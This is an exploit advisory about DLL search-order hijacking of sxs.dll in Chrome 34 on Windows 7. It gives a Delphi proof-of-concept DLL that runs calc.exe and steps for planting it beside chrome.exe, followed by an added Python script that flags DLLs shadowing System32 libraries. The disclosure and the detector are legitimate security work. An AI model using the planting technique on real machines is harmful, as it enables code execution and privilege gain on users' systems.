Google Chrome version 34.0.1847.131 suffers from a DLL hijacking vulnerability.
# Google Chrome latest Version 34.0.1847.131 m 32-bit DLL Order Hijacking
#
###########################
#
# Exploit Title: [Google Chrome Version 34.0.1847.131 m 32-bit DLL Order Hijacking]
# Date: [2014/04/25]
# Exploit Author: [Aryan Bayaninejad]
# Linkedin : https://www.linkedin.com/profile/view?id=276969082
# Vendor Homepage: [http://www.chromium.org/]
# Software Link: [http://www.filehorse.com/download-google-chrome/]
# Version: [Version 34.0.1847.116 32-bit ]
# Tested on: [Windows 7 Ultimate - 32bit]
#
###########################
Details:
Untrusted search path vulnerability in the latest Chrome version [34.0.1847.131]
when running on Windows 7 32-bit allows local users and possibly remote
attackers to gain privileges via a Trojan horse DLL, sxs.dll, in the current
working directory.

It's a DLL order hijacking that lets me execute arbitrary code beside
Google Chrome. The latest version of Chrome suffers from load order hijacking
of the "Sxs.dll" library. I attached proof-of-concept code that will run
beside your Google Chrome if you put it beside chrome.exe; it works like
a charm and will execute calc.
// Proof of concept body: launches calc.exe when the DLL is loaded.
uses
  Windows;
begin
  WinExec(PAnsiChar('C:\WINDOWS\system32\calc.exe'), SW_SHOW);
end.
Compile the above source code with Delphi and rename the compiled DLL to
sxs.dll. Then copy it to the Chrome installation path. Now, if you run
Chrome, the DLL will be hijacked!
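
For defenders, the condition described above (a DLL beside chrome.exe that carries the name of a system library such as sxs.dll) can be audited. The following is an added example, not part of the original advisory or of Chrome: the function name, directory layout and file contents are constructed for illustration, and real use would pass the Chrome installation directory and the Windows System32 directory.

```python
import hashlib
import tempfile
from pathlib import Path


def sha256(path: Path) -> str:
    return hashlib.sha256(path.read_bytes()).hexdigest()


def find_shadowing_dlls(app_dir, system_dir):
    """Report DLLs sitting in app_dir whose name also exists in system_dir.

    Windows file names are case-insensitive, so names are compared lowercased.
    Only app_dir itself is checked, because that is the directory searched
    first when the executable loads a library by bare name.
    """
    system = {p.name.lower(): p for p in Path(system_dir).iterdir()
              if p.is_file() and p.suffix.lower() == ".dll"}
    findings = []
    for dll in sorted(Path(app_dir).iterdir()):
        if not (dll.is_file() and dll.suffix.lower() == ".dll"):
            continue
        match = system.get(dll.name.lower())
        if match is None:
            continue  # the application's own DLL, no system namesake
        findings.append({
            "path": str(dll),
            "shadows": str(match),
            # A differing hash means the local copy is not the system file.
            "same_content": sha256(dll) == sha256(match),
        })
    return findings


def demo():
    # Constructed sample layout standing in for an install dir and System32.
    with tempfile.TemporaryDirectory() as tmp:
        app, system = Path(tmp, "Application"), Path(tmp, "System32")
        app.mkdir()
        system.mkdir()
        (system / "sxs.dll").write_bytes(b"constructed system library")
        (system / "kernel32.dll").write_bytes(b"another constructed library")
        (app / "chrome.exe").write_bytes(b"constructed executable")
        (app / "app_helper.dll").write_bytes(b"constructed app library")
        (app / "SXS.DLL").write_bytes(b"constructed planted library")
        return [(Path(f["path"]).name, f["same_content"])
                for f in find_shadowing_dlls(app, system)]


if __name__ == "__main__":
    print(demo())
```

A finding is a lead to investigate rather than proof of compromise; checking the flagged file's signature and who can write to the directory are the usual next steps.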